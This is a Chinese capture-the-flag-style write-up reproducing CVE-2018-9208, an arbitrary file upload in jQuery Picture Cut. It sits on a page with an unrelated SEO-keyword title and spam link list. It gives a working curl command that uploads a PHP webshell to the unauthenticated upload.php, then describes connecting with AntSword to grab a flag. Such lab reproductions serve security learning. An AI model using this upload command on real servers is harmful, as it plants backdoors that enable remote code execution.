当前位置: 首页 > news >正文

wordpress单独下载页企业网站优化解决方案

wordpress单独下载页,企业网站优化解决方案,wordpress分享微信插件,百度推广图片jquery-picture-cut 任意文件上传_(CVE-2018-9208) 漏洞信息 jQuery Picture Cut v1.1以下版本中存在安全漏洞CVE-2018-9208文件上传漏洞 描述 ​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap…

jquery-picture-cut 任意文件上传_(CVE-2018-9208)

漏洞信息

  • jQuery Picture Cut v1.1以下版本中存在安全漏洞
  • CVE-2018-9208
  • 文件上传漏洞

描述

​ picture cut是一个jquery插件,以友好和简单的方式处理图像,具有基于bootstrap或jquery ui的漂亮界面,具有ajax上传,从资源管理器拖动图像,图像裁剪等强大的功能。jQuery-Picture-Cut/src/php/upload.php 中调用…/core/PictureCut.php 处理文件上传的代码不检查文件类型并允许用户选择文件位置路径。未经身份验证的用户并将可执行的 PHP 文件上传到服务器,从而允许执行代码。

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

访问首页

image-20231027115056615

使用命令将一句话木马传上去,目录为volfucs安装该靶场的位置

jquery-picture-cut/src/php/upload.php
curl  -F  "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@yijuhua.php" http://10.9.47.6:56174//jquery-picture-cut/src/php/upload.php

image-20231027115508665

使用中国蚁剑连接

http://10.9.47.6:56174/yijuhua.php

image-20231027115602804

获取flag

image-20231027115638391

http://www.hengruixuexiao.com/news/24665.html

相关文章:

  • 分类信息网站如何做排名北京网站排名seo
  • 4s店网站建设方案给公司做网站要多少钱
  • 广州实时热点新闻事件seo搜索引擎官网
  • 青岛html5网站制作网络销售工资一般多少
  • 想做企业网站新媒体营销推广方案
  • 网站难做吗互联网营销的十五种方式
  • 专门做衬衣网站wordpress免费网站
  • 中企动力销售赚得多吗厦门seo推广外包
  • 音乐网站的建设搜索引擎优化的方法包括
  • 做3d模型网站赚钱么网站排名前十
  • 网络管理员网址盐城seo培训
  • 网站备案要钱吗seo优化排名方法
  • py网站开发每日舆情信息报送
  • 网站建设后压缩代码要做网络推广
  • 保险微网站制作网站更换服务器对seo的影响
  • 开封做网站公司汉狮福州短视频seo
  • 青岛高端网站设计哪家提升关键词排名seo软件
  • 牡丹江有做网站的人吗百度搜索引擎入口登录
  • 从化营销网站建设手机百度提交入口
  • 网页设计与网站建设-学用一册通百度关键词优化是什么意思
  • 公司网站建设目标百度网站怎么申请注册
  • 售后服务规范网站建设个人介绍网页制作
  • wordpress用户勾选搜索引擎营销优化的方法
  • 建可收费的网站企业网站定制
  • b2c网站开发背景网站关键词优化软件
  • 深圳今日刚刚发生的新闻关键词优化公司推荐
  • web网站开发职业方向seo排名工具给您好的建议
  • 网站更新文章首页不显示网站友链交换平台
  • 哪些行业网站推广做的多数据分析软件工具有哪些
  • 杭州建设主管部门的网站seo整站网站推广优化排名